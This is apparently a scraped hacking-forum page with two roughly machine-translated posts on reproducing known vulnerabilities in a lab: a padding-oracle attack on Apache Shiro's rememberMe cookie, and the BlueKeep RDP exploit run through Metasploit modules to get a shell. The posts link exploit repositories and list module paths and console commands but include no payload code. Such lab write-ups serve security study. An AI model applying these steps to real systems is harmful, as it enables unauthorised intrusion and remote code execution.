1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316 1317 1318 1319 1320 1321 1322 1323 1324 1325 1326 1327 1328 1329 1330 1331 1332 1333 1334 1335 133
  24. UKhackteam

    Title: Apache Shiro padding oracle attack vulnerability reappears

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Apache Shiro padding oracle attack漏洞复现 Shiro uses AES-128-CBC mode to encrypt cookies, resulting in malicious users who can construct serialized data through padding oracle attacks for deserialization. For example, the SHIRO-550 vulnerability that was exposed before is a problem with the remember cookie. 环境搭建 shiro package environment download address https://github.com/jas502n/SHIRO-721 exp Download address https://github.com/Geekby/shiro_rce_exp Reproduce environment: ubuntu16.04 + tomcat8 + shiro 1.4.1 1 apt-get install tomcat8 tomcat8-docs tomcat8-examples tomcat8-admin Then deploy the downloaded samples-web-1.4.1.war package to tomcat. 漏洞复现 Visit the shiro login page Enter the username and password, click Remember Me Visit any page to get the rememberMe in the cookie Generate java class payload Execute exp Get the cookie after padding oracle attack Note: The cracking time is long, lasting about 100min - 120min. Copy the cookie and replay the packet Check the execution results Found that the success file was successfully created and the command can be executed 参考 https://www.anquanke.com/post/id/192819 https://github.com/jas502n/SHIRO-721 https://github.com/wuppp/shiro_rce_exp
  25. UKhackteam

    Title: CVE-2019-0708 Remote Desktop Code Execution Vulnerability Recursive

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    CVE-2019-0708 远程桌面代码执行漏洞复现 漏洞环境 Target machine IP: 172.16.105.129 Attack aircraft IP: 172.16.105.1 Install Windows 7 SP1 using VMware Fusion under mac. The download link is as follows: Windows 7 SP1 Download Link : ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ Note: Since exp currently only supports the following versions of the system, systems that install other versions of the system may not be able to utilize. Open the remote desktop function of win7: msf 环境准备 Download https://github.com/rapid7/metasploit-framework/pull/12283/files The attack suite in https://github.com/rapid7/metasploit-framework/pull/12283/files places the file into the corresponding folder of msf (if the file with the same name already exists, just overwrite it) 1 2 3 4 rdp.rb - /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb - /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb - /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb - /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb 漏洞利用 Enter msfconsole After entering, use reload_all to reload 0708RDP to utilize module Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rce to enable the 0708RDP attack module Use show options to view the options you need to configure: 使用默认的 shell Fill in the configuration information and execute the attack: 使用 meterpreter 的 shell Note: Please restart the target machine between two attacks, otherwise the attack will fail!

Important Information

HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.